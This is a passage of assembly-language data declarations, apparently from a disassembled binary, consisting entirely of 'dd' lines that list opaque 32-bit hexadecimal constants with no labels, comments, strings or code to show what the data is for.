dd 919FA692h, 0CD84EECCh, 40B72A13h, 644BE685h, 0FE90AA9h
dd 2626B8EBh, 34394456h, 0ACF0DA19h, 0F6078E9Ah, 0A3E818B8h
dd 0F979D7F7h, 0D9A93505h, 0AFA053B7h, 0AEA07E1Dh, 0B3A05280h
dd 3E56CF4Eh, 0E1AED1E2h, 685D6FF7h, 27CB9083h, 5F8C5BF4h
dd 0B04F2EF4h, 0EB1D1C0h, 0C62E7B75h, 0EE6E5BE4h, 0A82CEF88h
dd 67B133EBh, 4DD8A5EAh, 74F0AD31h, 88A585B0h, 0CF8C5D28h
dd 0F6F3EF83h, 96DDB904h, 0E4861EB2h, 18EB97ADh, 8BBD6C16h
dd 0FD4CF724h, 43EAFF25h, 0E71F0AD8h, 0DCC27689h, 76EA4245h
dd 887F1B97h, 0FC63EAEDh, 6B77245Ch, 182A16E7h, 57C6675Ch
dd 0E055040Eh, 0E4823DDDh, 550CADCEh, 589E4D69h, 869F59F5h
dd 145D269Bh, 759D5AB7h, 0A04F9149h, 0CACC859Ah, 0D9F5EF8Bh
dd 772A9151h, 0BC3F7549h, 88B2D8B8h, 3752012Dh, 0AD92D57Ch
dd 90562BE2h, 9E021C7Bh, 9CC3E69Fh, 0B38DD948h, 11B15CB8h
dd 32E37965h, 1029FF95h, 466D7CFEh, 0BE180955h, 166C6D67h
dd 604D5577h, 0A364D1DAh, 6752F65Dh, 3BA6B905h, 0E7FC6833h
dd 8166B7FBh, 0DFDFA1D8h, 0C3DC2FEBh, 0CA495A55h, 2B6A275h
dd 727D4AAEh, 0ABAE060Dh, 3499E04Dh, 0CA37FD0Bh, 0E6CE54DBh
dd 77F4191h, 0F3EADEC3h, 0AC8324C0h, 0E0FB907Ch, 2BDD1728h
dd 0F5E1551Eh, 0B3F05B91h, 1A70E7B5h, 1A5C8BDCh, 94F7BC43h
dd 7B45B6AFh, 0A3A15095h, 0E66BB259h, 0F221AE02h, 795723D9h
dd 0BE1C0A83h, 0A07E20B4h, 0FFA9ED55h, 0C45CA9BEh, 870FC7F0h
dd 0A9A7C18Ah, 15D4AAC4h, 670BF7C1h, 1A1DB6CFh, 8768631Ah
dd 2059065Bh, 0F3C5EFEEh, 0D97790F0h, 1F0FACF0h, 659D078Fh
dd 0BB68CCE5h, 0AEDFD6CEh, 0C0C44483h, 0B1C06CAEh, 0F9C2C581h
dd 0DF2CF1ABh, 4DC97498h, 0E53DB3DEh, 8C115567h, 4A9E0ECDh
dd 492ABCB7h, 3CA9A81h, 3574AFA3h, 1ADECCE9h, 2B98B87Eh
dd 0B22BF04Ah, 7EB5DA8h, 59B40746h, 3FADF6F0h, 749D30FCh
dd 24A1DD97h, 8E106D78h, 0D8E56EE8h, 0E9EC2684h, 6E6EA3AEh
dd 0B1CEB73Bh, 0E5B92148h, 0B56F1D61h, 8A8D3519h, 0D0E0A814h
dd 0A54B3CD0h, 0F841275Bh, 26885776h, 4F696FF8h, 21150F1Eh
dd 334043E8h, 33BCA945h, 0FDFB6165h, 85F3EA17h, 13E5E818h
dd 197C3525h, 0E036558Dh, 0BCAF3665h, 607A6808h, 8512A241h
dd 0E55A3658h, 0EF768D0Bh, 6A493E5Ah, 5D11ED50h, 975CFF75h
dd 0ADB354C6h, 0A95AD6C6h, 0CF4707E0h, 79DE2EB9h, 72DBAB01h
dd 0E0B81CD3h, 4D42C18Eh, 5FEF3C08h, 1641D172h, 4827992Fh
dd 0AEA967B4h, 8097BC92h, 51542737h, 0DFEB6697h, 323FF0CDh
dd 60937EC6h, 61EA4C47h, 827F46EDh, 38922EB4h, 89EBBEEDh
dd 0CFE5AE3h, 0D9B84DE2h, 0B19962D3h, 24CB57C9h, 5836715h
dd 698378D7h, 4A97F92Fh, 1FB448A1h, 4A27D6C5h, 0CE705EE0h
dd 0C9F1C93Ah, 0BA34D5F6h, 0E2C0EB2Dh, 0B4347571h, 82B4C8Bh
dd 5AB56328h, 0DE95E043h, 0A1AC8FF0h, 2B4C0575h, 0EFE7D9EEh
dd 5FC5C899h, 0E419C31Eh, 5E9CDEE7h, 0A9752838h, 46913D93h
dd 0D3C2511Dh, 0B9340124h, 6B6574Ch, 0A781BF7Eh, 52AD3535h
dd 3A576EAFh, 82DDEFD2h, 7FE9E3ECh, 2AF5A8EEh, 42DC32A4h
dd 0EB332929h, 0D6DFD26Ah, 6236A3A8h, 916A6020h, 0CFD5A5D4h
dd 0B4597D94h, 1637F93Ch, 2AF7AE0Fh, 0C96103ECh, 0E1288E12h
dd 0A7644232h, 0F1A719F8h, 0BF78B3BCh, 6E3EF7F4h, 0E57CE5E5h
dd 3B45F152h, 9A562859h, 49A8120Bh, 0DF95E4EAh, 0BC0A7E16h
dd 17575062h, 29DEC092h, 1205E8A5h, 0B4DFF666h, 3C486967h
dd 1719E9B9h, 0E1B01FDFh, 0C234E0F9h, 89E0FC7Eh, 9AEABA6Fh
dd 64365409h, 8CA7602Bh, 8D7BC65Ah, 1D91451Bh, 0A0461E8Bh
dd 42EFBC94h, 0B3469522h, 1945C1BDh, 9265D32h, 5365761Fh
dd 0DB14498Eh, 5A64AB81h, 0C78E8A1Ah, 49F5FF7Eh, 1A9DF53Bh
dd 15EDE7A2h, 0ED7993Bh, 87BA3FF4h, 0F47E32A3h, 0DB8991DFh
dd 776D1DC9h, 515D2DC7h, 897A3325h, 2A6EC646h, 0FD7A8A34h
dd 0FE0BB037h, 78FF9825h, 6CDD6E9Fh, 0CEA3A38Bh, 74A26E5Eh
dd 93CC5C8Dh, 0B2E30A38h, 0A0281683h, 33AD5F43h, 2BB5D919h
dd 0B2D40DA4h, 553BB8B0h, 29392B25h, 5F2B12F4h, 8E84A151h
dd 837E158h, 83E0BA2Ah, 3443138Fh, 0FD793B13h, 0C4E7CB68h
dd 0C5AC151Ch, 8ADBFA0Dh, 0BCC11EA9h, 642699D6h, 0E21CFAA8h
dd 0A2AFF289h, 0F1D5CD47h, 0A88F1D85h, 0BE96F42Eh, 2E1ADED4h
dd 93B3FE5Ah, 58DA06D5h, 0EE931F65h, 54C6FB14h, 689C214Ah
dd 0B95A92A7h, 51DF4EF1h, 13D2DBECh, 61768D76h, 66B4681h
dd 8528800Eh, 0DBF6AB45h, 8B231052h, 0A1EF26DBh, 3C235356h
dd 0E70DAEF8h, 66816A62h, 9738C215h, 0D5D99173h, 0C74273BFh
dd 7028FD93h, 0BA3D5A1Ah, 96415A11h, 474DB451h, 71977483h
dd 0BA5E1EA6h, 55673A6h, 0FFFC0B45h, 0F2B4B392h, 16CFBF0h
dd 0E079EE16h, 697856E9h, 3FF6FC5Ch, 0F02BB97Eh, 0AE9D87E6h
dd 0E2EC844h, 2EBBCA96h, 230264EEh, 0D93F755Dh, 0C4D1319Eh
dd 0B15AD8E1h, 0B7CA8345h, 0C5793905h, 0D164BE02h, 367B45BEh
dd 5D6358B3h, 0DB1AF034h, 7A4DCA8Eh, 55305C2Ch, 0D4E83D61h
dd 0FE331ADDh, 19974CCBh, 0F2AB3CBCh, 0E9EC1A6Bh, 2D020293h
dd 5A35B617h, 323C7C3Dh, 3C2D89F0h, 0A70E49A1h, 0B2630B2Ch
dd 0DFFCD934h, 965990B2h, 919F5C75h, 8823E26Eh, 83A2697Ch
dd 0E40E2F76h, 20E6059h, 3BEEC3D3h, 0D3FE4705h, 7004AD1Ah
dd 50FC1E26h, 63CC2461h, 9DD8575Dh, 24C7707Ch, 8FE28954h
dd 0E70EE0EBh, 6DBA5FD8h, 0F1902FD2h, 0B14BC443h, 0CC87D575h
dd 0BC040DA0h, 8D9A86CBh, 0E04C8A8Dh, 0BFDE9661h, 0A3AD4213h
dd 0F8D8EF54h, 558C6321h, 563E65E1h, 7882F1E9h, 97CC069Bh
dd 0BF870FE8h, 91C85A19h, 61EE3FECh, 9765A6C1h, 34EAFDCBh
dd 6F07368Ch, 5F45DFDBh, 955CC103h, 58A533A8h, 7FC682E8h
dd 0B7C54246h, 64B8EE3Eh, 7FCC88C4h, 0C0C32DE2h, 0BA1DAEE9h
dd 2CC9232h, 1095ED74h, 0C921D49Dh, 0BBC533A6h, 259C8F90h
dd 6417537Ah, 0F52F9D4Fh, 1E5FFEF2h, 0CBF2EAD9h, 29F84A71h
dd 0A4DEEA7Ah, 7D62CF87h, 88B71624h, 42C340B1h, 0E07E817Fh
dd 5EE78BF7h, 832255FFh, 9D389E5Fh, 4639EFC1h, 0F5BD0B95h
dd 0D439F5DDh, 38514BDh, 592C5503h, 35FBFD94h, 95190DCCh
dd 6765E27Fh, 894DF9EEh, 0D17FC54h, 0E37C5672h, 95115BA4h
dd 0BFDEE482h, 6C53D28Ch, 0A9193265h, 4852898Ah, 0A4C0A319h
dd 71B016BDh, 667C7925h, 0E02A08CFh, 0D5900E1Ah, 49509D05h
dd 0B2E6B2FEh, 2AB56739h, 0B6482548h, 0CB9108DDh, 0BAA64C16h
dd 0AA7AFE32h, 742B9CCBh, 0D33E2493h, 75F750F2h, 0C54BEB11h
dd 896DF170h, 3E13F441h, 616924BAh, 176DA8E5h, 93BD2AAAh
dd 0B23B8F04h, 0AED1800Ch, 2E58DA90h, 9215AB5Fh, 0D2E21F1Eh
dd 5190F466h, 58E6D0EFh, 0FF3A308Ch, 1F9D31B2h, 2DDF0DDFh
dd 0EE7C5C90h, 954A2E80h, 0E744A5C8h, 0A636D1A7h, 3F99A0B5h
dd 0E2618F44h, 475BEAB9h
dd 0DEF17B76h, 3993BF10h, 0BBB0BEDh, 0AE28B722h, 0C5A31F30h
dd 0C2AAD340h, 65006B77h, 0D6941A34h, 0FDBE3488h, 0AE74633Bh
dd 1FF3D92Ch, 15863B60h, 0DF4DFDDBh, 59267F84h, 599FDF5h
dd 0D6EC6C7Bh, 63E333Bh, 0ADE17470h, 0B354196Ah, 85546D79h
dd 0C1E4A1E8h, 64CAF8F2h, 0DBFDEAFDh, 0F0B53E36h, 1367C33Bh
dd 0F735265h, 881DC759h, 0ED05F896h, 27B65B56h, 40BF9E0Ch
dd 7E766B93h, 0E901AA45h, 591D191Bh, 0B3AF46D3h, 49BCEA5Dh
dd 89918A9Ah, 2360A62h, 6881D561h, 643DF1Fh, 7B904628h
dd 0D144422Ch, 0F96DABDEh, 9739DEB1h, 3C321A2Dh, 0C8250BEh
dd 24B9B275h, 0B7861080h, 687C0BFh, 63678049h, 0BD3446A6h
dd 0EFB3EEABh, 0D91462F8h, 0F15ABF26h, 0B384B4C3h, 0DA8A3A33h
dd 56B6DF81h, 0B44E2B1Fh, 3C6A2757h, 0F0AEBB9Fh, 8E34C5C1h
dd 0EAB62F4h, 43F0B6EFh, 42AAB792h, 2AE14EBh, 0A950C5FAh
dd 0F7F95BB6h, 4261680h, 35897659h, 4DC3150Bh, 0C64194B2h
dd 500EE3BAh, 0CFE4FDF1h, 0E7F87CBDh, 518DAA95h, 0A5F970ECh
dd 78B1CC37h, 6BADFE70h, 967005BBh, 43670FC5h, 0C83E6B05h
dd 5F9E8E6Dh, 0CC9BA325h, 49E008CCh, 8F5624CCh, 9A34DF7Bh
dd 0A00661F8h, 4AD1FDC2h, 0ADDA1B3Ch, 0E0F8027Eh, 0B2FF1B1h
dd 0B2611793h, 500E2655h, 0B170545Eh, 8D6E6F66h, 131458E5h
dd 9F1381BAh, 2C3D6914h, 0E73205A8h, 8AB523F3h, 0E6AEA9D9h
dd 1753A335h, 0A444EC1Fh, 0B53FB11Ch, 80180BF1h, 64C396Dh
dd 52C56553h, 0F07A49E6h, 1DA4AC57h, 7E321DE9h, 0D4C23028h
dd 2FF944BEh, 1E7542BEh, 0B27EA258h, 85B83B2Dh, 0F411B82Dh
dd 0B4535B08h, 7F4D2592h, 901D751Fh, 7C512F39h, 8651C15Fh
dd 0E954EF56h, 0F567303Fh, 6BEC3AEEh, 0ECD75CF9h, 7D184DB3h
dd 22793294h, 0E55585DAh, 0F533ED5Ah, 78E84D76h, 0A8649F93h
dd 0AB81F3A6h, 0BE1DF3FAh, 17F17E1Ch, 67600F97h, 7FE79EF1h
dd 3AA18061h, 0E92C34FAh, 0BB34314Bh, 0BAB485A4h, 1B667A04h
dd 0BB0FAE42h, 0EB6B6FC6h, 7B302A50h, 660CA7D7h, 5F9D692Ch
dd 34C5E1E6h, 0A82B01F4h, 6CB3FA50h, 0A84AA748h, 5496EBACh
dd 6E3AA303h, 0B511986Fh, 83ED67C6h, 2B3B0098h, 782D90A5h
dd 0A4D983E2h, 0CF316CFh, 3796DDA6h, 5D73A995h, 8634EB49h
dd 12BBC18h, 41CFC494h, 7CAD0039h, 9A43FA23h, 0C1C3059Dh
dd 0C522DF32h, 5B8A0243h, 0E9752304h, 8EAACFEFh, 609F6610h
dd 0AD6CE470h, 2E2A73ACh, 1527EF1Ch, 74F8FB08h, 4A8E3DEDh
dd 0CE7EAFF6h, 0E32AFE82h, 35762DFBh, 0D6CAFE78h, 92FB06E1h
dd 0D044FF25h, 94A75E29h, 0E908AD53h, 0D9973BBCh, 15F1DC25h
dd 55070B60h, 4CD7C24Fh, 781FBBCBh, 0EB74E438h, 0E549960Ah
dd 0ECC89E17h, 9F1F325Ch, 0B5B498C8h, 6A3EBBBBh, 7DAF14C2h
dd 76D5B585h, 4EABE337h, 3AB3DB16h, 0BFC64BB2h, 34FF80DDh
dd 0FEE6B9F1h, 53E33768h, 3DA394CBh, 971AAF37h, 7D6D3572h
dd 8B36A8CAh, 49EDD172h, 2D3E343Ah, 0F954F320h, 98D39EB3h
dd 6158279Fh, 0AA3D336Eh, 0D14C5793h, 5DB0C47Ah, 55B4CD45h
dd 22176387h, 0ABBD59F6h, 19ED2A83h, 0AAB5CB4Ah, 12D9DBE8h
dd 0C3F0348Eh, 0EF41DDDDh, 0DE41A51Fh, 5A5B2C8Bh, 69DCBF7Ch
dd 0DC04FBBDh, 0E084E0F7h, 0F1D84A6Bh, 8E265BA4h, 0A340117Fh
dd 0CADDC904h, 1FE5FA2Bh, 0DA591CF3h, 8C25CDB9h, 3AC4F816h
dd 0C7C2A3DFh, 0A2CFAA10h, 2191D7E6h, 0DECF58E0h, 0FFBFFF4Fh
dd 59EF14CFh, 5F45F2BEh, 0C6DA3D0Fh, 2F04F7B8h, 4625057Dh
dd 4092F922h, 55B39756h, 0FB15615Ch, 91EA5A54h, 5FECC117h
dd 110A276Dh, 199119h, 5455DD62h, 321D0CB4h, 0CF506449h
dd 374CA5DEh, 0B800B6Dh, 9F530F07h, 1E6AA852h, 0E0A80BADh
dd 0D59D7841h, 379C75A5h, 0C340FC5Fh, 812C94FCh, 0EAD6EF83h
dd 0B70D88C0h, 0A4B18F6Dh, 1692E36Dh, 665BEE3Eh, 2D36FE6Ch
dd 0F02BF0DAh, 55879F2Eh, 6B00A66Dh, 7F5F14A8h, 6572B2EBh
dd 40BEAF74h, 0B411C744h, 28DA29C5h, 0EE01F3B3h, 148DAABAh
dd 38C6552Fh, 0C2F568Eh, 0ED9C9BC9h, 8C84085Ch, 17E19759h
dd 0E5499ACDh, 0B7306657h, 0D2D61BE8h, 0A398FC5Ch, 851CA93Ch
dd 739FDB4Ch, 0CEABEEFBh, 7CF73F45h, 0E59AF7C9h, 0C5B84221h
dd 7EE6E420h, 0BBB85D78h, 22328C97h, 0D90D658Dh, 767F7D4h
dd 0B7C6C62Bh, 83259438h, 2EB43D2h, 0BC41127Ah, 51CE34ECh
dd 49F0551Ch, 0F5129A98h, 7C256D2Eh, 48FE7D93h, 5DF0CD9Ah
dd 5B58AB88h, 0A77FCCBDh, 7C8DFD7Bh, 0B3C6F5F3h, 4C82E7D6h
dd 0ED8E7027h, 0C184DD0Eh, 0D3DFEB0Dh, 3E5623E9h, 738EA7FCh
dd 0CFAEFEFh, 6B75D395h, 8CDEBF5Ah, 56DA32D6h, 705AF5A5h
dd 1F6D6DF1h, 0D032E2EBh, 1B449855h, 76DBE78h, 0E7259972h
dd 0FC3B66D1h, 55F2CD2Dh, 0A98DE716h, 3CAFCF60h, 0AD1C9B0h
dd 0B5449EBEh, 799A89EAh, 8DC2BB3Fh, 0B9B8BFD9h, 29EFCB42h
dd 8155C5D6h, 0FB83F6CEh, 8943B451h, 0F74447D2h, 0F1B2F1D6h
dd 0B2CC40C0h, 0B094DAFBh, 1DBB0D62h, 0D21692DAh, 5726768Fh
dd 0A8030865h, 0FD2942DDh, 7223DE0Eh, 334BC42Ch, 0DF1A0F86h
dd 8BF2360Ah, 4AD172BAh, 0F79F34A5h, 0E6CB0DEBh, 0D6B33D1Ah
dd 0D5674187h, 589DC34Eh, 0D14E64A2h, 0A44ABBDAh, 809B93C1h
dd 707CA742h, 4BF571AAh, 3EA271C3h, 0A1A3D27Dh, 0A4CE89A0h
dd 3AFD5DD6h, 0CF3227DAh, 4BD6C0DAh, 1F2DAFD3h, 42C6D84Bh
dd 500406F7h, 0D5F080E5h, 9A661554h, 1A7F147Ch, 0AC773E53h
dd 0B1B420A9h, 0FB8EFBD1h, 4F7E6025h, 132F5A53h, 16C07BFh
dd 0A71C88D0h, 0D4AC1EDCh, 0C9016CB8h, 0CC3F229Fh, 0CEEA1BFEh
dd 45FE03E3h, 2ACBE8F7h, 8712DFE5h, 0E30F2AF8h, 607E7710h
dd 0D14AFDCEh, 5C9E10EBh, 89EEDBE5h, 0D5E6A3E7h, 5F1D60BEh
dd 0E9290EDEh, 5A8CFB10h, 0F41880D5h, 0CBC2291Dh, 2F0FFBBEh
dd 57DAC5F9h, 9E82C574h, 0C0FA124Dh, 0BDA517CAh, 6B23FAF6h
dd 4AA29DF9h, 3D63576Eh, 0F78E8E99h, 0AB82E6Dh, 6EBF44FEh
dd 0D0663B9Eh, 59EF3A85h, 17DAA6C7h, 0B7E1EA6Dh, 52D4D195h
dd 6774A4ACh, 0A4848FEDh, 43FF5F91h, 0D59598F4h, 2B55FEF5h
dd 5DD07AABh, 8543EB2Ah, 0BFEB4549h, 0A4A4AE37h, 0D6652C05h
dd 0BED276E1h, 0EB2B20B9h, 56B70A7Ah, 89E8B57Eh, 7C506E15h
dd 8E0FDE32h, 81F4965Eh, 90B7BE0Dh, 3974FE76h, 8A5A128Bh
dd 35873FC8h, 7B2139DCh, 379554BEh, 6199F80Dh, 0B47EAFE2h
dd 1C76624Ch, 0FF9D2F4Ah, 8B9F5AB4h, 8E60B003h, 0B47019C6h
dd 0E249F54Ah, 91145798h, 615A7D01h, 8951DF28h, 1AAF615Ch
dd 55A58083h, 21DECC4Ah, 9779CC43h, 0F814B35Ch, 0A121AD58h
dd 4A9DE7F5h, 1B989157h, 0E5ED2E0Dh, 5A379BFFh, 0AAAFB2F0h
dd 97C336DDh, 4D2910C7h, 1DE95E70h, 0FE9B101Bh, 52179674h
dd 0E4A7626h, 97429E7Fh, 8FB338ABh, 68802868h, 6528CE52h
dd 0F5B8D304h, 46DBF3D6h, 6D64BF47h, 0D5E114B3h, 86E76ED8h
dd 7135DB3Ah, 0C4A153DAh, 5C25214Bh, 1B3B25CAh, 6FB228CFh
dd 0E3B081E7h, 768C76D8h, 0EB2EC971h, 0FCA1BC37h, 793DCB69h
dd 0CD1EDE99h, 1195F5Ah, 0FC0CD6BDh, 0A8B349E6h, 0A7B3C76h
dd 0CC173C27h, 175C89E8h, 6D9EEBBBh, 67D43DDAh, 3EB5A42Ch
dd 0AADC1A83h, 4D31A3B2h, 7EE6FA71h, 6559398Eh, 7C22EC9h
dd 66A1A8C5h, 0CE1B919Ah, 99F2B830h, 0C606A7A1h, 5CDF568Eh
dd 0A5D723F9h, 0A6302E75h
dd 0AE96005Bh, 53C067FEh, 0F6EC4CAAh, 2F2E8AC4h, 0E85C8014h
dd 0BFEFD61Bh, 0D779A6DBh, 0DC1EB3D1h, 3C5E4BEh, 0E1F13447h
dd 0C7BAD6EDh, 631C291Bh, 89B75497h, 0B3232547h, 0CF8DDD76h
dd 934B4F09h, 6C3F12AAh, 0F0AD93DFh, 0EE4B07A3h, 0C8B4C40Ah
dd 0D55AB98Dh, 0FB801CD0h, 0EFC9BDAEh, 52851A87h, 0CD07E077h
dd 89555E13h, 64A8AA05h, 98EC8A5Ch, 0ADDE2734h, 0F6AE8AFBh
dd 59AC2813h, 9F584C2Dh, 9DBBF2A7h, 0A0527F26h, 53E67B69h
dd 323549AAh, 0C437B943h, 2BEDD5A5h, 0F6C6FE83h, 359F8D36h
dd 0A8FA534Eh, 3BFECDC0h, 66D82153h, 4E995422h, 291D9776h
dd 58E1FCC7h, 90DDED59h, 4FC11463h, 0D32EDC3Fh, 5C389D85h
dd 80ADF859h, 1B2CDE03h, 0C859B19Eh, 0FB3113AEh, 90FB33A2h
dd 0A5F8C229h, 3FBAFB62h, 7FD8121Ch, 7303A6B5h, 61720866h
dd 1D67D8D5h, 0B72A8A9Ch, 0B53DEBFh, 0F7CCE543h, 7063B415h
dd 3E8A63CEh, 0B5D99F15h, 66033F85h, 0AA94E7AFh, 0B2B35A22h
dd 38E5C5ECh, 2C337C75h, 0CEA83C0Ah, 7A091F87h, 5AA5CD9Ah
dd 0BE0EE3F4h, 17D8718Eh, 2364A31h, 1218A28Ah, 80ED97A2h
dd 0F03B4FD1h, 76986282h, 0BFD79BD1h, 0DC95704Ch, 1E9F01BDh
dd 0A6A192E0h, 6E9E1A36h, 7EAB73A5h, 571E3950h, 54D8F968h
dd 3FD865A1h, 317636E2h, 754B4A75h, 0F66688B6h, 8D18712Ah
dd 0BFA08C08h, 0FCCC15F2h, 897A80B3h, 920E2E91h, 33BA62Bh
dd 0CA52CAE1h, 0C8F2E554h, 6D148304h, 86FC8367h, 92A808FEh
dd 0E0CCAD96h, 0D75BE5A7h, 1390F1A5h, 0CCCCAE2Dh, 0BA8C8764h
dd 7D77711Eh, 0F066B68Eh, 637F55F9h, 0E3A5264Fh, 229F63E9h
dd 7653A347h, 0C0612B5Ah, 9BE2CF0Fh, 0C9683A0Fh, 5FE98A5Ch
dd 0EA0694ABh, 0ABE4FED7h, 0A9BCB260h, 70475F68h, 459A35F8h
dd 7451D49Bh, 0D4014CCCh, 0D35527B2h, 689217D9h, 99EFF214h
dd 7DBF825h, 0D2E81326h, 2E833EBAh, 6CE2CDC9h, 579A4AB5h
dd 0A9C4903Eh, 332A56CCh, 0CD5FC463h, 0F64AAC65h, 8595DDE7h
dd 1135E932h, 33B3E150h, 0A3F40C83h, 0B95FDC78h, 0E5ABAC6Dh
dd 0C3060D23h, 0D2B53EB8h, 3A66ABB2h, 43F0F6E1h, 5929A08Bh
dd 1196CD5Ah, 0BEDA6AFFh, 0A5EFE390h, 0AFB4BA74h, 0CDEA89BDh
dd 28CB5238h, 57A5A53Ah, 6D90CA4Dh, 6DFB2B26h, 9220E3B9h
dd 94D54998h, 0A059BDBDh, 672EDC18h, 0DFC7BE9Ch, 53A9064h
dd 0B4ACD517h, 5BA8D1C5h, 62DF1FA7h, 7F31B5FDh, 0DDE141A2h
dd 0E3679BCFh, 8309ABA2h, 0B4551596h, 8098AD8h, 0A0892B32h
dd 0B69C3622h, 0A2E2DCF7h, 0EF97982Fh, 0AFE40E95h, 9081F08h
dd 0E0D4CA80h, 0A8D0FBF0h, 43EA6B4Bh, 683B116Dh, 65CB75A9h
dd 427F5ADEh, 118131A6h, 0F8CCAAFBh, 3F8A4DFBh, 578EDA26h
dd 28D125A5h, 6AA754C9h, 47D658FAh, 634A98DEh, 61F8B827h
dd 4D59EB69h, 6B1D92Fh, 4BC7B6BFh, 0C541D49Eh, 0F542C0E0h
dd 0D013CCB7h, 48AA6768h, 2DD30A24h, 0B0899A9h, 9216DE3Ah
dd 0FA0157B6h, 0CA209CAEh, 0BDBCE12Ch, 7898C829h, 0BEDFD67Ah
dd 0AC17F99Fh, 0B2E6BF16h, 0FC16E3F6h, 3664B190h, 0B715FB86h
dd 0FF0A7FCCh, 0ED559D69h, 7086D86Dh, 746D84E1h, 153717F1h
dd 295CECABh, 458B734Ah, 99E29FACh, 545F9281h, 819DAE0Ch
dd 2BCA6673h, 259BC464h, 0BFB7E85Ah, 0FA5F4B11h, 7F015C6Ch
dd 41E2EB71h, 0C754BAFEh, 7235D288h, 0BEBEFC9h, 631373F9h
dd 0E9CF2C42h, 114A8537h, 75F30C4h, 0A7FE9DACh, 8EFBD276h
dd 47302F6Ch, 41270256h, 7DC18CD1h, 55A1D91Ah, 8B4D46DCh
dd 46BAFCBEh, 33B1D34h, 5D3FE51Ch, 525ACD10h, 58B74C3h
dd 0D12B7EC6h, 529EF762h, 0A228C9B6h, 29E4C843h, 0D8861175h
dd 446B93D3h, 5C4A3797h, 28075FE9h, 1783334Fh, 60783EB4h
dd 7ECBC08Eh, 691B704Fh, 0F04268C6h, 0FD53A0CDh, 55F2BFFDh
dd 34B0657Dh, 0F75937A9h, 3E18ACF2h, 1D243E38h, 15D4EDA2h
dd 0CA59A82Eh, 89F95270h, 7703E7D4h, 0D7F489F6h, 0B22BF3D1h
dd 81D1DA55h, 929DC14Dh, 63B7F18h, 7946CC58h, 2DE502E0h
dd 653199FBh, 81E5763Eh, 5B4C6AFBh, 0DCBAE021h, 5461197Fh
dd 0CCE7DFF6h, 3725AB6Dh, 4E236CADh, 684293B4h, 3899F3ADh
dd 9E76C0E8h, 0BDE67607h, 0AFF23180h, 0D2C14353h, 0E368E46Fh
dd 5C8B628Dh, 92D1BE45h, 0D04CCB75h, 962E05F9h, 0C17FA9FFh
dd 3BDC36D0h, 71DEC537h, 0EF490BCh, 97E5D639h, 1935E110h
dd 54D18D33h, 19255787h, 56E8BA9Fh, 2D5EE33Eh, 7AFBAA81h
dd 0E8EAC0F2h, 584CE89Ah, 28DF9AA9h, 55A95B6Eh, 0E7130EA2h
dd 0C462646Fh, 46D4E555h, 1DA1B186h, 0A9D86215h, 182677Dh
dd 0D9643562h, 0BF0867C3h, 0F86510FCh, 234C09FDh, 7ECB1FFBh
dd 72CA45CFh, 0B2A0F24Dh, 57DEFCE5h, 0CDC12695h, 0DC1B26BAh
dd 5F05654Ch, 0F455F57Fh, 241ED1EFh, 0A1D8C8A1h, 83109DE6h
dd 0C3128669h, 0A058A2AEh, 0BB3F7DBDh, 78B07EA6h, 0A07F25AEh
dd 93E5C87Ah, 5A74A68Dh, 8BFDE3DDh, 0E2EC90DBh, 8D3F18ADh
dd 69275DA5h, 0F0425118h, 78A96102h, 0EA55783Ch, 0FB6AF29Ch
dd 32AD9E06h, 435297E6h, 522C77A5h, 0C291BE8Ah, 7DA4FC27h
dd 9BA39CB4h, 0A5971798h, 8F8E9C6Bh, 0ECC8365Fh, 1799293h
dd 0AC743B92h, 32545492h, 0FE35A18Fh, 68A65107h, 3A45B2ADh
dd 2EBAC965h, 3B235A2Dh, 2EF3D87Eh, 0EA0BBDFFh, 14811555h
dd 955CC7FDh, 92D3B463h, 65A112E2h, 8C39750h, 4369B121h
dd 25A3791Ah, 321AB34h, 0CA764AA9h, 0AC6CC874h, 83120EDBh
dd 6A054CE3h, 0E44558B7h, 4FADA71Ah, 1B665FCEh, 30518A95h
dd 9108A0C7h, 0F05A3ABAh, 4056BD72h, 0EB6DDBA8h, 75A9CA31h
dd 56CAC6CDh, 7A379AF5h, 0EC9B501Bh, 0E2303A82h, 7FBF2076h
dd 0E1372231h, 0BCDE220Bh, 1B62DA57h, 9F1C88E6h, 0F591B07Eh
dd 0A9345DA3h, 3F0F6229h, 8DBFACCCh, 688E2B9Fh, 0A4EB23E7h
dd 119C41ABh, 6D53EC9Bh, 955C0FDFh, 7EBF8D7Fh, 559F850Fh
dd 306EC54Fh, 0E99DE3EBh, 1CCCA6B6h, 0BCA90482h, 0AE4639B0h
dd 0DB2F4DB5h, 57BABDF7h, 7BEA60D6h, 330F08C6h, 0F4F77336h
dd 85EA2EC0h, 0CB5A5D9Ch, 684E1F8Bh, 0BE6D99CDh, 8DDAB656h
dd 19C9429Fh, 8B194385h, 0AFB24E3Bh, 0D7984D58h, 95FD421Dh
dd 0CCE234FAh, 8FDCDCE9h, 3913AEECh, 0A5DA3C5h, 2CA87B2Fh
dd 8249E7A2h, 43B2A8F4h, 0EB56463Eh, 61096834h, 391D456Eh
dd 0BC8775EDh, 7B59D96Fh, 4EE89D3Ch, 5B340A59h, 0EB1197A9h
dd 51AF4B13h, 0FDC636E3h, 0B3EA7D6Ah, 7D75DCBh, 25990895h
dd 31C838A5h, 5307AF53h, 92464FF9h, 0F200CF86h, 0DD7E90FAh
dd 55418267h, 13D4F5C9h, 1B94A033h, 4BD7C933h, 0E82AA5A8h
dd 0AD8A689Fh, 39D63985h, 0E16AF153h, 0C3DA9268h, 6CB0C011h
dd 65054531h, 83C218ADh, 830FD7B1h, 412B799Eh, 7FCE59A2h
dd 0D317F81Eh, 0B37937A0h, 0A704F39Ah, 0ED81ACEBh, 0AC2B2BCAh
dd 2BB08332h, 298DB169h, 95FBD1A1h, 4018C815h, 96760C31h
dd 2591E694h, 18865A0Ch, 0FE1673E5h, 0DB5F3DF9h, 0EF1244BFh
dd 9AC520CDh, 0A68282C0h, 7878B32Bh, 38A052E5h, 2539F94Eh
dd 666D42F0h, 0D3BF3349h, 0E92E5C98h, 0AF955173h, 6382B678h
dd 4618D72h, 2431A533h, 33B574F0h, 27AD34D2h, 5FBF585Ah
dd 6E720B1Ch, 2274A368h, 6F1E4DEDh, 3C6C42Fh, 0BD584657h
dd 0E869DFF0h, 335F9744h, 13AAB4DCh, 4F8E935Eh, 85B22DB4h
dd 9173E9DDh, 9D0A51BEh
dd 0C276D62Fh, 0E182A85Fh, 83D07935h, 695D444Ah, 0F0777430h
dd 0CC545B0Eh, 18479BDh, 0CEAC1895h, 3EA390Ah, 8FAD1FB5h
dd 0FA43A652h, 0C54FB967h, 0D5FF2C5Ch, 69CA4420h, 5A67E894h
dd 64B025A1h, 0A033B064h, 25D0F6DCh, 540E86F9h, 0E9084997h
